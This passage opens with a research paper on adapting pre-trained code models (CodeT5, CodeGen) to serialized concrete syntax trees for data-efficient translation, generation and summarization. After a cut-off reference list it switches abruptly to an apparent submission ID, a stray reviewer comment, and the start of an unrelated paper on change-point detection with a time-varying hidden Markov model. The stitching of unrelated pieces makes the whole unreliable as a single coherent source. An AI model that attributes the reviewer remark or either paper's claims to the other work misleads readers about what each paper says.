We argue, however, that source code carries well-defined structures that may be leveraged to enhance the performance of coding tasks. These structures unveil the compositional semantics of code, thereby fostering the learning of compositional solutions within neural models, if properly modeled. Unlike natural languages, where obtaining syntax structure can be challenging due to intrinsic ambiguity, programming languages come with grammars and compilers that can unambiguously and efficiently parse a program. The resulting parse tree, a concrete syntax tree (CST), is only one example of a program's various structural representations. Other well-studied structures in the field of program analysis include, for example, abstract syntax trees (ASTs), control flow graphs (Allen, 1970), program dependence graphs (Ferrante et al., 1987), code property graphs (Yamaguchi et al., 2014), control dependence graphs (Cytron et al., 1991), and system dependence graphs (Graf, 2010). All these representations structure a program and offer additional insights beyond the sequence representation.
Many of these representations and variants have been exploited for program understanding and vulnerability analysis, often paired with graph neural networks or graph transformers because they are capable of encoding structured data [Allamanis et al., 2018; Zügner et al., 2021]. For a similar reason, structural representations should also help code–code translation and text–code generation tasks, when a model learns not only the association of text but also the mapping between structures. This work advocates using CSTs to adapt pre-trained models for coding tasks. The focus on using CSTs rather than other structures comes with several reasons. First, most important tasks require decoding a program (such as code translation and generation). It is unclear how one can deduce a program from various graph representations of code; it is also challenging if one works on the ASTs. Second, off-the-shelf CST parser generators exist for many languages, and the support for additional languages is expected to grow (Tree-sitter). Tooling support contributes to the feasibility and practicality of using CSTs. Third, being a tree, a CST can be converted to and from a sequence by using an easily defined invertible mapping. Such a property allows reusing the model architecture (i.e., Transformer) that encodes and decodes sequences without modification. In this work, we will explore both conversion directions of tree serialization and de-serialization for sequence modeling of code (in Section 3.2). Building on the notable benefits of CSTs as a structural representation, we advocate their use for continual pre-training and fine-tuning a pre-trained language model for coding tasks. First, we formulate pre-training objectives that leverage the extensive structural information of CSTs, enhancing the structural understanding of code within pre-trained sequence models. Subsequently, we develop structured fine-tuning that enables quick adaptation at minimal costs, requiring significantly less data than plain-text code. This approach is particularly advantageous when working with low-resource languages where monolingual data is sparse and parallel data is even more scarce; it is also beneficial when collecting sufficient data for a downstream task is difficult. While in-context learning offers an alternate solution, it often falls short, especially when accessing a large model is beyond one’s limited budget. In this work, we demonstrate that in the low-data scenario, fine-tuning with structures can outperform not using structures by as much as 15 BLEU points and 8 CodeBLEU points for the Java-C# code translation task (both directions) using only 100 training examples. Similarly, in the text-to-code generation task for the MBPP dataset, employing structures with only 100 training examples significantly improves the pass@1 metric, increasing it from 1.68% to 4.40%. The contributions of this work can be summarized as follows. 1. We introduce a novel approach for the structured pre-training and fine-tuning of pre-trained language models. In particular, we explore the serialized form of CST, considering its suitability as an output format of code for decoding, beyond merely facilitating representation learning. 2. Our structured pre-training and fine-tuning method is applicable to both encoder-decoder and decoder-only models. Through empirical experiments with both types of models, we have observed consistent and beneficial results from our approach. 3. 
We demonstrate that structured fine-tuning allows data-efficient adaptation of pre-trained models, compared with the usual fine-tuning that treats source code as plain text. In particular, with small training data, using structures generally improves the performance of a variety of tasks, including code translation, generation, and summarization.

2 RELATED WORKS

**Machine Learning for Code** Early approaches applied statistical learning methods to programming tasks (Nguyen et al., 2013; Movshovitz-Attias & Cohen, 2013; Raychev et al., 2014; Allamanis et al., 2014). With the advent of deep learning, deep neural networks gradually replaced pure statistical approaches (Allamanis et al., 2016; Mou et al., 2016; Gu et al., 2016; Iyer et al., 2016). However, these models were often task-specific and were trained on particular datasets, limiting their adaptability to custom tasks. More recently, with the increasing popularity of pre-trained models in natural language processing, similar pre-trained models for code were introduced. Among the pioneering efforts, Kanade et al. (2020) trained a BERT-based model on a large-scale Python dataset and showed improved performance on multiple downstream tasks with limited fine-tuning. Subsequently, multiple pre-trained models with varying architectures, data composition, and code representations were proposed. Notable examples include CodeBERT (Feng et al., 2020), GraphCodeBERT (Guo et al., 2020), PLBART (Ahmad et al., 2021), CodeT5 (Wang et al., 2021), UniXCoder (Guo et al., 2022), CodeGen (Nijkamp et al., 2022), and StarCoder (Li et al., 2023).

Figure 1: A representative Python program along with its CST (simplified for illustration) in the tree and serialized forms, respectively. Also illustrated are the masked subtree prediction and masked node prediction training objectives we propose to adapt encoder-decoder models to code structures.

**Incorporating Structured Representations for Code** Given that code can be represented by structures such as syntax or parse trees, data flows, and execution flows, several works explored various approaches to integrate these structures into code models. For instance, Mou et al. (2016) introduced a convolutional kernel applied to the program's AST. Phan et al. (2017) proposed leveraging the program's execution flow in combination with graph-based CNNs for software defect prediction. Meanwhile, Hu et al. (2018) proposed converting an AST into a sequence using tree traversal and employing an LSTM to generate code comments. Zhou et al. (2019) utilized composite code representations, including the AST, control flow, data flow, and natural code sequence, for vulnerability detection. To incorporate code structures into the Transformer architecture, prior works introduced novel positional encodings that represent node positions within the tree (Shiv & Quirk, 2019; Peng et al., 2022); or they utilized syntax or parse tree traversals or path information to provide structural information to the model (Kim et al., 2021; Wang & Li, 2021; Peng et al., 2021; Jiang et al., 2021; Guo et al., 2020). Additionally, specific tree-based attention mechanisms have been proposed (Tang et al., 2022; Wang et al., 2023). In all the aforementioned works, regardless of whether the code structure is incorporated, models treat source code as plain text during downstream tasks. In contrast, we propose to not only encode but also decode serialized CSTs to inject structural information into the model.
3 Structured Code Representation

A compiler transforms the high-level source code written by programmers into low-level machine code that can be executed on a computer's hardware. Broadly speaking, the compilation consists of two phases: the front end (analysis) and the back end (synthesis) (Aho et al., 2007). The front end includes lexical analysis (tokenization), syntax analysis (parsing), and semantic analysis, generating an AST or a similar intermediate representation that captures the program's logical structure and semantics. Therein, grammar specifies how keywords, identifiers, and literals should be structured, which the front end uses to break the source code into individual tokens and create the syntax tree, ensuring that the source code adheres to the language's syntax rules.

3.1 Concrete Syntax Tree

In more detail, compiler front ends typically start by creating a CST from the input source code and then abstract away the non-essential details from the CST to create the AST. A CST is a tree representation of the source code according to the language's grammar. It closely mirrors the code's textual structure and includes all the syntactic details like parentheses and punctuation. In contrast, an AST simplifies the CST, retaining only the program's logical structure. While ASTs are more commonly used due to the balance they strike between compactness and preserving essential program structures for further analysis and transformations, we use CSTs for program representations for several reasons. First, CSTs faithfully retain the exact syntactic structure, including all punctuation, whitespace, and formatting. This preservation of syntax is essential when one must provide all the details of the code to the model and precisely reconstruct the code from the model-generated CST. Second, CSTs are more generally applicable than ASTs, as they can be built directly from the language's grammar without resorting to the language-specific optimizations or implementations required by ASTs. We do note, however, that CSTs are typically more verbose than ASTs due to their inclusion of all syntactic details.

3.2 Serialization and Deserialization

A CST is an n-ary tree, where each node can have a finite but arbitrary number of children. We call the leaf nodes terminal nodes and the rest non-terminal nodes. The terminal nodes contain all textual information of the code, while the non-terminal nodes correspond to grammar rules. In Figure 1, terminal nodes have a filled background, and one sees that these nodes are sufficient to deduce the program from the tree. However, one must serialize the tree to make it consumable by a typical Transformer, which in turn admits a guaranteed process for deserialization in subsequent uses. To this end, we define the serialization as a pre-post-order tree traversal, where a node is visited before its ordered children and is revisited after all its descendants have been visited. Let Node denote the current node and let subtree denote the subtree rooted at Node and excluding Node. Then, the serialization reads (recursively)

\[ \texttt{(\_Node} \;\; \texttt{subtree} \;\; \texttt{Node\_)}, \]

where \( \texttt{(\_Node} \) and \( \texttt{Node\_)} \) are separate tokens that represent the first and second visit of Node in the traversal. See Figure 1 for an example. Explicitly marking the boundary of the subtree by \( \texttt{(\_Node} \) and \( \texttt{Node\_)} \) is necessary to ensure unambiguous deserialization. For more examples, see Appendix A.
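As a concrete illustration, the following is a minimal sketch of this pre-post-order serialization on top of Tree-sitter, assuming the `tree_sitter` and `tree_sitter_python` packages (constructor signatures vary slightly across py-tree-sitter versions). Joining terminals with spaces in the deserializer is a simplification; a faithful deserializer would recover exact whitespace from the terminals' byte offsets.

```python
import tree_sitter_python as tspython
from tree_sitter import Language, Parser

parser = Parser(Language(tspython.language()))

def serialize(node):
    """Pre-post-order traversal: emit (_Type ... Type_) around every
    non-terminal; terminal (leaf) nodes emit their source text."""
    if node.child_count == 0:
        return [node.text.decode("utf8")]
    tokens = [f"(_{node.type}"]          # first visit of the node
    for child in node.children:
        tokens.extend(serialize(child))
    tokens.append(f"{node.type}_)")      # second visit of the node
    return tokens

def deserialize(tokens):
    """Recover program text: keep terminals, drop the bracket tokens."""
    return " ".join(t for t in tokens
                    if not (t.startswith("(_") or t.endswith("_)")))

tree = parser.parse(b"def add(a, b):\n    return a + b\n")
print(" ".join(serialize(tree.root_node)))
```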
4 Adapting Pre-Trained Models to Code Structures

Existing pre-trained models are generally trained on source code treated as plain text, without explicit incorporation of the structural information. We propose to adapt these models to code structures by using serialized parse trees for further pre-training and fine-tuning, whenever possible. The fine-tuning part is straightforward. However, fine-tuning alone is not sufficient to learn embeddings for the non-terminal nodes. Hence, in this section, we mainly discuss the pre-training part, specifically the pre-training tasks. Note that training data often include not only code but also text (e.g., source code with comments). We develop pre-training tasks that effectively learn the structural elements alongside the remaining code and text. In what follows, we use \( x, y, z \) to denote natural language text, program text, and the corresponding serialized parse tree, respectively.

4.1 Encoder-Decoder Models

**Masked SubTree Prediction (MSP)** To learn the tree structure, we propose to randomly mask subtrees before encoding and ask the decoder to predict them (see Figure 1). Specifically, we mask 15% of the nodes in the parse tree by randomly selecting non-terminal nodes and masking their entire subtrees, until the budget is attained. We replace each of the selected subtrees with the same mask token and ask the model to predict these subtrees. After serialization, masking subtrees is effectively equivalent to masking the corresponding span from the sequence of the serialized tree. Hence, this technique can be considered a tree extension of the masked span prediction objective popularly used in natural language models (Raffel et al., 2020; Joshi et al., 2020; Wang et al., 2021). The training objective can be written as
\[ L_{\text{MSP}} = \sum_{t=1}^{k} \log p(z_t^{\text{mask}} \mid z^{\backslash \text{mask}}, z^{\text{mask}}_{<t}), \]
where \( z^{\backslash \text{mask}} \) is the masked input and \( z^{\text{mask}} \) is the masked sequence to predict, with length \( k \). Since the subtrees include non-terminal and terminal nodes, this task aids the model in learning the relationship between language grammar (non-terminal nodes) and code semantics (terminal nodes).

**Masked Node Prediction (MNP)** To enable the model to further learn the language grammar, we propose the masked node prediction objective, where all the non-terminal nodes are masked by a unique sentinel token and together form, in their original order, a sequence \( I \). The decoder is then asked to predict \( I \) (see Figure 1). This task is similar to the masked identifier prediction objective of Wang et al. (2021) and the DOBF objective of Lachaux et al. (2021), except that the masked tokens here are not the original program tokens. The training objective can be written as
\[ L_{\text{MNP}} = \sum_{t=1}^{|I|} \log p(I_t \mid z \setminus I, I_{<t}), \]
where \( z \setminus I \) denotes the serialized tree with non-terminal nodes masked. We note that this is a much harder task than the MSP objective, because in MNP the majority of the tree is masked and the model has to learn the language grammar to predict it.

**Text-to-Tree (TeTr) and Tree-to-Text Conversion (TrTe)** When the data contain natural language ↔ code pairs (e.g., code with a natural language description), we encode either part and decode the other to align both parts.
The training objectives can be written as
\[ L_{\text{TeTr}} = \sum_{t=1}^{|z|} \log p(z_t \mid x, z_{<t}), \qquad L_{\text{TrTe}} = \sum_{t=1}^{|x|} \log p(x_t \mid z, x_{<t}), \]
which are similar to the typical objectives \( \log p(y_t \mid x, y_{<t}) \) and \( \log p(x_t \mid y, x_{<t}) \) used in Wang et al. (2021), except that code \( y \) is replaced by the serialized tree \( z \). These two tasks match the downstream utilization of the model, where it has to either generate code given a natural language description or summarize the given code in natural language.

4.2 Decoder-Only Models

For decoder-only models, we find that it is effective to reuse the causal language modeling objective over the serialized tree \( z \):
\[ L_{\text{DEC}} = \sum_{t=1}^{|z|} \log p(z_t \mid z_{<t}). \]
When there exist natural language ↔ code pairs, we replace \( z \) in the above formula by \( z' = [x : z] \); that is, the concatenation of text and code. Compared with the specialized objectives MSP and MNP for encoder-decoder models, here we require the model to reconstruct all tokens (both terminal and non-terminal nodes) in an autoregressive manner.

5 Experiment Setup

5.1 Pre-Trained Models and Tokenizers

To evaluate the proposed method, we use two existing pre-trained models, one encoder-decoder and one decoder-only.

- CodeT5 (Wang et al., 2021) is an encoder-decoder model trained on the CodeSearchNet dataset (Husain et al., 2019) using denoising seq2seq objectives on code data, along with bimodal conversion objectives between natural language and code. We use the CodeT5-base (220M) model for experiments.
- CodeGen (Nijkamp et al., 2022) is a decoder-only model sequentially trained on an English corpus (CodeGen-NL), followed by a code dataset collected from Google's BigQuery (CodeGen-Multi), and then a Python dataset (CodeGen-Mono). We use the CodeGen-Multi (350M) model for experiments.

In addition to adapting the pre-trained models to structures, we augment the respective tokenizers by including the non-terminal nodes, each treated as one token. This allows the model to learn targeted embeddings for the non-terminal nodes and also makes the input/output length manageable. In the ablation study (Section 7), we show that omitting the non-terminal node tokens from the tokenizer substantially compromises downstream performance.

5.2 Pre-Training Dataset

We use the CodeSearchNet dataset, augmented partially by the Stack dataset (Kocetkov et al., 2022), to further train the pre-trained models. CodeSearchNet contains nearly 6.5 million data samples extracted from the most popular GitHub projects with permissive licenses. Among them, around 2.3 million samples have comments accompanying the code, while the remaining are code segments only. CodeSearchNet covers six programming languages but misses some languages used in our downstream tasks, namely C and C#. To include these languages, we subsample 1 million samples for each from the Stack dataset, resulting in a total of 8.5 million samples across eight programming languages. More details are given in Appendix B.

5.3 Continual Pre-Training

We further pre-train CodeT5 and CodeGen using the objectives described in Section 4. We train for one epoch, using 32 V100-32GB GPUs with an effective batch size of 1024. We provide the list of hyper-parameters in Appendix C. It is important to note that the continual pre-training is rather lightweight.
Compared with the reported training time of 12 days using 16 A100-40GB GPUs for the CodeT5 model and 450,000 steps for the CodeGen model, our continual pre-training takes only 15 hours for CodeT5 and approximately 8,000 steps for CodeGen.

### 5.4 Data-Efficient Fine-Tuning

Existing benchmarks for evaluating code models typically use datasets containing a few thousand to several hundred thousand data samples. For instance, the Java-to-C# code translation dataset in CodeXGLUE (Lu et al., 2021) contains 10.3k samples, while the text-to-code Concode dataset (Iyer et al., 2018) contains 100k samples. While it is possible to curate data at great expense in a one-time effort, in many scenarios dataset creation can be financially burdensome and even practically unattainable. This issue is even more pronounced for low-resource languages or domain-specific languages. Hence, we direct our attention to low-data scenarios by using data-efficient approaches. In this context, our experiment setting is to fine-tune models using only a few hundred samples, with the overarching aim of improving downstream performance on small data.

### 5.5 Evaluation Metrics

Evaluating generative models for code initially followed procedures similar to those for evaluating text generation, such as comparing generated code samples to reference samples using the BLEU score (Papineni et al., 2002) or Exact Match (EM). However, EM fails to consider code variability in achieving the same objective, and BLEU's correlation with semantic code correctness is weak, as highlighted by Tran et al. (2019). To address this, Ren et al. (2020) introduced CodeBLEU, a composite metric combining BLEU, weighted n-gram matching, syntactic AST matching, and semantic data flow matching, demonstrating stronger alignment with human-assessed code quality. Along with fuzzy metrics, recent studies, including Roziere et al. (2020) and Kulal et al. (2019), turned to functional correctness assessment. This approach involves generating multiple code samples and deeming the problem solved if any sample passes all test cases. Chen et al. (2021) further refined this method, addressing its high variance with an unbiased estimator. In our work, we adopt the estimator introduced by Chen et al. (2021) to gauge functional correctness; a code sketch of this estimator is provided at the end of Section 6.

## 6 Results

To evaluate the effectiveness of our approach, we fine-tune CodeT5 (+structure) and CodeGen (+structure) on five downstream tasks, including code translation, code generation, and code summarization. For each task, we fine-tune the models with a few hundred data examples but evaluate the test accuracy on the complete test set. We repeat each experiment with five random seeds and report the mean and standard deviation.

### 6.1 Code Translation

Code translation benchmarks aim to translate reasonable-length code segments from one programming language to another. Code translation has many practical uses, such as IT modernization, where legacy code needs to be rewritten in a modern language to reduce maintenance costs. For this task, we use the Java-C# translation dataset available within the CodeXGLUE benchmark (Lu et al., 2021). This dataset contains parallel code between Java and C# at the function level; it was extracted from multiple open-source projects that contain parallel implementations. The results for Java-to-C# and C#-to-Java are shown in Figure 2. We see that both base models perform poorly when fine-tuned with only 100 examples, but they steadily improve as more examples are provided.
Specifically, the encoder-decoder model CodeT5 performs better than the decoder-only model CodeGen. Additionally, we observe that the structured models consistently outperform their base counterparts by a significant margin, in both translation directions. It is worth noting that the greatest improvement appears in CodeT5, where fine-tuning with as few as 100 examples results in an improvement of nearly 15 BLEU score points and 8 CodeBLEU score points in both directions. These improvements persist as we progressively increase the number of examples to 1000.

### 6.2 Code Generation

Code generation is the task of generating source code given a natural language description. For this task, we test our method on three datasets: (a) the CoNaLa dataset (Yin et al., 2018), which contains curated pairs of descriptions and Python program snippets mined from StackOverflow; (b) the Concode dataset (Iyer et al., 2018), which consists of paired Java programs and comments collected from GitHub projects; and (c) the Mostly Basic Python Programming (MBPP) dataset (Austin et al., 2021), a crowd-sourced dataset of Python programs along with descriptions.

In Figure 3, we present the results for these benchmarks. For the CoNaLa and Concode benchmarks, we report the BLEU, CodeBLEU, and EM scores. For the MBPP benchmark, we report the pass@1 score instead of EM, because this dataset contains unit tests for each data sample. For the CoNaLa benchmark, we observe that both the CodeT5 (Structured) model and the CodeGen (Structured) model outperform their base variants by nearly 15 BLEU score points and 10 CodeBLEU score points. It is worth highlighting that while the CodeGen base variant underperforms the CodeT5 model on this benchmark, the structured CodeGen counterpart outperforms both base variants by a large margin. For the Concode benchmark, we see substantial improvements in the CodeBLEU scores for both structured models, but the results on the BLEU score for the CodeT5 (Structured) model are mixed, lagging behind the base variant for the initial data points. Finally, on the MBPP benchmark, we observe significant improvements on all three metrics. Both models improve the BLEU and CodeBLEU scores, and the CodeT5 (Structured) model also significantly improves the pass@1 metric, from 1.68% to 4.40% when utilizing only 100 fine-tuning samples and from 4.72% to 6.48% when utilizing all 374 examples available in the MBPP benchmark. The decoder-only model CodeGen also displays improvements across all three metrics: gains of up to 10 BLEU and CodeBLEU score points, and a 1 percentage point improvement in the pass@1 score.

### 6.3 Code Summarization

Code summarization is the task of generating a natural language description for a given code segment. We utilize the CodeSearchNet dataset (Husain et al., 2019) to evaluate the performance across six programming languages. In Figure 4, we show the average BLEU scores. Detailed results for each language are provided in Appendix D. We observe that the CodeT5 (Structured) model improves the average performance by 0.5 BLEU score points when fine-tuned with only 100 examples, and this gap widens to about 2 BLEU score points when utilizing 500 fine-tuning examples. Similarly, the CodeGen (Structured) model demonstrates improvement over its baseline variant, albeit with relatively modest gains: an improvement of 0.5 BLEU score points over the baseline with 500 fine-tuning examples.
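To close this section: the unbiased pass@k estimator of Chen et al. (2021), adopted in Section 5.5 and used for the MBPP results above, can be computed as in the following sketch (the sample counts in the usage example are illustrative assumptions):

```python
import numpy as np

def pass_at_k(n: int, c: int, k: int) -> float:
    """Unbiased pass@k estimator of Chen et al. (2021):
    1 - C(n-c, k) / C(n, k), computed stably as a running product.

    n: number of generated samples per problem
    c: number of samples that pass all unit tests
    k: evaluation budget
    """
    if n - c < k:
        return 1.0  # fewer failing samples than the budget: some draw must pass
    return 1.0 - float(np.prod(1.0 - k / np.arange(n - c + 1, n + 1)))

# e.g., 200 samples per problem, 13 of which pass the tests
print(pass_at_k(200, 13, 1))   # 0.065 (= 13/200)
print(pass_at_k(200, 13, 10))  # larger budget, larger estimate
```

The per-problem estimates are then averaged over the benchmark to obtain the reported score.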
## 7 Ablation Analysis

In this section, we aim to better understand the key contributors to the improved performance of structured code models compared to their base variants. We investigate three downstream tasks, namely code translation from Java to C#, code summarization for Go, and code generation with the Concode dataset. For each of these tasks, we fine-tune the CodeT5 model with 500 examples and present the mean BLEU and CodeBLEU scores over five random seeds in Figure 5. We note the observations below.

**Fine-tuning base models on serialized parse trees alone results in a performance drop** For this experiment, instead of fine-tuning the base model on source code as text, we fine-tune it on serialized parse trees. This allows us to understand the role of serialized trees alone in the model performance. Interestingly, we observe a significant drop in performance on all three tasks compared to the base variant, indicating that naively fine-tuning the base models on serialized parse trees does not yield any performance gain. We note that the key reasons behind this performance drop are: (a) the non-terminal nodes are split into multiple sub-tokens, resulting in a loss of context, and (b) the increased length of input/output sequences results in greater truncation of context.

**Adding new non-terminal tokens to the base model results in a performance gain** We next experiment with adding the non-terminal nodes of the parse tree as special tokens to the tokenizer and then fine-tuning the model. With the updated tokenizer, we allow the model to learn specialized embeddings for non-terminal nodes and also keep the length of the input/output sequences manageable. We find that adding non-terminal nodes as special tokens in the tokenizer helps the model achieve better performance. However, compared to the base model, the results are mixed: on the translation tasks, the performance is better than the base model, but on the summarization and generation tasks the performance lags behind.

**Continual pre-training provides additional performance gains** We next compare the performance of the structured model (i.e., the model with the updated tokenizer, adapted to structures through continued pre-training) with the variants noted above. We find that the structured model achieves the best performance across all tasks and metrics, suggesting that both the updated tokenizer and the pre-training objectives play important roles in improving the model performance across all tasks.

## 8 Conclusions

In this work, we explore data-efficient fine-tuning of code language models by utilizing the serialized parse tree of source code. We develop training objectives for both encoder-decoder and decoder-only models to enable the adaptation of existing pre-trained models to code structures. Evaluating the approach on multiple downstream tasks, including code translation, generation, and summarization, we observe significant gains in both fuzzy metrics (BLEU and CodeBLEU scores) and functional metrics (pass@k score), especially in low-data scenarios.

## References

Wasi Ahmad, Saikat Chakraborty, Baishakhi Ray, and Kai-Wei Chang. Unified pre-training for program understanding and generation. In Proceedings of the 2021 Conference of the North American Chapter of the Association for Computational Linguistics: Human Language Technologies, pp. 2655–2668, 2021.

A. Aho, M. Lam, R. Sethi, J. Ullman, K. Cooper, L. Torczon, and S. Muchnick. Compilers: Principles, Techniques, and Tools. 2007.
Miltiadis Allamanis, Earl T Barr, Christian Bird, and Charles Sutton. Learning natural coding conventions. In Proceedings of the 22nd ACM SIGSOFT International Symposium on Foundations of Software Engineering, pp. 281–293, 2014.

Miltiadis Allamanis, Hao Peng, and Charles Sutton. A convolutional attention network for extreme summarization of source code. In International Conference on Machine Learning, pp. 2091–2100. PMLR, 2016.

Miltiadis Allamanis, Marc Brockschmidt, and Mahmoud Khademi. Learning to represent programs with graphs. In ICLR, 2018.

Frances E. Allen. Control flow analysis. SIGPLAN Notices, 5(7):1–19, 1970.

Jacob Austin, Augustus Odena, Maxwell Nye, Maarten Bosma, Henryk Michalewski, David Dohan, Ellen Jiang, Carrie Cai, Michael Terry, Quoc Le, et al. Program synthesis with large language models. arXiv preprint arXiv:2108.07732, 2021.

Mark Chen, Jerry Tworek, Heewoo Jun, Qiming Yuan, Henrique Ponde de Oliveira Pinto, Jared Kaplan, Harri Edwards, Yuri Burda, Nicholas Joseph, Greg Brockman, et al. Evaluating large language models trained on code. arXiv preprint arXiv:2107.03374, 2021.

Ron Cytron, Jeanne Ferrante, Barry K. Rosen, Mark N. Wegman, and F. Kenneth Zadeck. Efficiently computing static single assignment form and the control dependence graph. ACM Trans. Program. Lang. Syst., 13(4):451–490, 1991.

Zhangyin Feng, Daya Guo, Duyu Tang, Nan Duan, Xiaocheng Feng, Ming Gong, Linjun Shou, Bing Qin, Ting Liu, Daxin Jiang, et al. CodeBERT: A pre-trained model for programming and natural languages. In Findings of the Association for Computational Linguistics: EMNLP 2020, pp. 1536–1547, 2020.

Jeanne Ferrante, Karl J. Ottenstein, and Joe D. Warren. The program dependence graph and its use in optimization. ACM Trans. Program. Lang. Syst., 9(3):319–349, 1987.

Jurgen Graf. Speeding up context-, object- and field-sensitive SDG generation. In 2010 10th IEEE Working Conference on Source Code Analysis and Manipulation, 2010.

Xiaodong Gu, Hongyu Zhang, Dongmei Zhang, and Sunghun Kim. Deep API learning. In Proceedings of the 2016 24th ACM SIGSOFT International Symposium on Foundations of Software Engineering, pp. 631–642, 2016.

Daya Guo, Shuo Ren, Shuai Lu, Zhangyin Feng, Duyu Tang, Shujie Liu, Long Zhou, Nan Duan, Alexey Svyatkovskiy, Shengyu Fu, et al. GraphCodeBERT: Pre-training code representations with data flow. In International Conference on Learning Representations, 2020.

Daya Guo, Shuai Lu, Nan Duan, Yanlin Wang, Ming Zhou, and Jian Yin. UniXcoder: Unified cross-modal pre-training for code representation. In Proceedings of the 60th Annual Meeting of the Association for Computational Linguistics (Volume 1: Long Papers), pp. 7212–7225, 2022.

Xing Hu, Ge Li, Xin Xia, David Lo, and Zhi Jin. Deep code comment generation. In Proceedings of the 26th Conference on Program Comprehension, pp. 200–210, 2018.

Hamel Husain, Ho-Hsiang Wu, Tiferet Gazit, Miltiadis Allamanis, and Marc Brockschmidt. CodeSearchNet challenge: Evaluating the state of semantic code search. arXiv preprint arXiv:1909.09436, 2019.
I5MquO1g7R
In the second sentence, it is also mentioned that $Q$ can be modeled using non-parametric techniques, but the following sentence (and the presented algorithm) only deals with a parametric distribution (with parameter $\Phi$). It might be good to mention how the algorithm changes when a non-parametric density estimation method is used.
CHANGE POINT DETECTION VIA VARIATIONAL TIME-VARYING HIDDEN MARKOV MODEL

Anonymous authors
Paper under double-blind review

ABSTRACT

The task of modeling time series data that exhibit sudden regime shifts has been an enduring focus of research due to its inherent complexity. Among the various strategies to tackle this issue, the Hidden Markov Model (HMM) has been extensively investigated; it captures regime changes by modeling the transitions between latent states. Despite its popularity, the HMM-based methodology carries certain limitations, including specific distributional assumptions and the computational intensity of inference and learning, particularly when the number of change points is unknown. In this work, we propose a novel approach that models the locations of change points and introduce the TV-HMM, a variant of the Hidden Markov Model incorporating a time-varying location transition matrix. Based on this modeling scheme, we propose an associated variational EM algorithm that simultaneously detects the locations and the number of change points, together with inferring the posterior distributions of the regime parameters. In contrast to previous approaches, the proposed method exhibits robustness against misspecification of the number of change points and can be augmented with stochastic approximation techniques to effectively mitigate the computational burden. Furthermore, we establish the statistical consistency of the change point location estimation under the Gaussian likelihood assumption. We also generalize the parametric likelihood function using the Maximum Mean Discrepancy (MMD) and propose the semi-parametric TV-HMM, which is free of distributional assumptions. A series of experiments validate the theoretical convergence rate and demonstrate our estimation accuracy in terms of the Rand index and MSE.

1 INTRODUCTION

One of the fundamental tasks in signal processing and time series analysis is identifying and analyzing a complex system with temporal evolution. The states of such systems are measured over time by a sequence of observations. Estimating the locations of abrupt distributional changes within the sequence is commonly known as the Change Point Detection (CPD) problem. Practically, many applications require solving the CPD problem, where the proposed methods are helpful for subsequent analysis of the sequence characteristics, such as gait analysis (Lee & Grimson, 2002), anomaly detection (Liu et al., 2018), biological diagnostics (Gardner et al., 2006), financial analysis (Andreou & Ghysels, 2002), and more. In this paper, we focus on offline change point detection methods (Truong et al., 2020), which analyze and operate on the complete dataset retrospectively. Compared to online CPD methods (Adams & MacKay, 2007; Chang et al., 2019), these methods are better suited for complex modeling, and they have access to the entire set of observations, which enables higher detection accuracy and a more comprehensive understanding of the overall patterns, trends, and characteristics of the regimes between adjacent change points.

There is a rich literature on the offline change point detection problem. Early work can be traced back to the 1950s, focusing on detecting mean value changes in independent and identically distributed (i.i.d) Gaussian random variables (Page, 1955). From the methodology perspective, Pein et al. (2017) detect change points based on the ubiquitous maximum likelihood estimation.
With the piecewise linear model assumption, Bai & Perron (1998) minimize squared and absolute cost functions over the observed sequence and the parameters. Harchaoui & Cappé (2007) detect change points by minimizing the kernel distance of observations in a reproducing kernel Hilbert space, while Zou et al. (2014) use an empirical distribution divergence measure. When it comes to Bayesian approaches, Barry & Hartigan (1993), Park & Dunson (2010), and Müller et al. (2011) develop the product partition model (PPM) for offline CPD, and Chib (1998) introduces a Hidden Markov Model (HMM) and determines the latent change point state by the Markov Chain Monte Carlo (MCMC) algorithm. Pesaran et al. (2006) introduce a hierarchical structure on the HMM where parameters follow certain common meta-distributions. Assuming regime durations have a Poisson distribution, Koop & Potter (2007) develop a time-varying parameter model with hierarchical prior distributions to detect change points. Additionally, Ko et al. (2015) combine the Dirichlet process with the HMM to estimate the latent state without prior specification of the number of states. A comprehensive review of offline change point methods can be found in Truong et al. (2020).

However, the effectiveness of these methods can be influenced by various hyper-parameters, e.g., the number of change points, the significance level, or penalty coefficients. Killick et al. (2012) adapt the CPD algorithm with a linear penalty on the number of change points. Determining the optimal values for these parameters may require specialized knowledge or additional evaluation criteria (Burnham & Anderson, 2004). Although some non-parametric Bayesian models (Ko et al., 2015; Peluso et al., 2019) do not require a predetermined number of change points, they often involve computationally intensive processes, such as MCMC sampling, to obtain posterior distributions for the entire dataset. Furthermore, previous studies on Bayesian CPD have mainly focused on algorithmic design and lack strong theoretical guarantees. The convergence rate and performance of these methods may vary depending on the specific problem and settings. Additionally, many CPD methods rely on parametric distributions, often assuming each observation to be normally distributed in order to detect changes in mean and variance. While these assumptions offer advantages in terms of interpretability and inference efficiency, it is still preferable to have a CPD method that is not limited by the likelihood assumption, as it would be more robust against model misspecification and outliers. Together, these limitations make such methods less practical for real-world applications and datasets.

In order to overcome the challenges of hyperparameter selection and computational burden, we propose the Time-Varying Hidden Markov Model (TV-HMM). Concisely, our contributions are as follows: 1) TV-HMM models the locations of change points with a time-varying Markov chain. Its transition matrix is indexed by every time step of the sequence, encompassing all possible change point locations. The adaptive updating of the transition matrix for each change point allows for more efficient change point detection without prior knowledge of the number of change points. 2) We develop a variational EM algorithm that can endogenously determine the necessary number of change points from the observed data. The algorithm leverages stochastic approximation by chronologically sampling an observation subset.
This reduces the computational cost compared to MCMC-based inference. Our theoretical analysis demonstrates the statistical consistency of our method in detecting change point locations. 3) To validate our theoretical results, we conduct numerical experiments and evaluate the performance of our proposed method on both simulated and real-world data. These experiments demonstrate the effectiveness and robustness of our approach. 4) We extend the parametric method to the semi-parametric TV-HMM, which alleviates the assumption of a parametric distribution by using the Maximum Mean Discrepancy (MMD) as the likelihood measurement. We introduce a new learning objective, MMD-ELBO, and train the model through the re-parameterization trick (Kingma et al., 2015). Our experiments show promising performance on non-Gaussian datasets without incorporating distributional knowledge.

2 TIME-VARYING HIDDEN MARKOV MODEL AND LOCATION TRANSITION

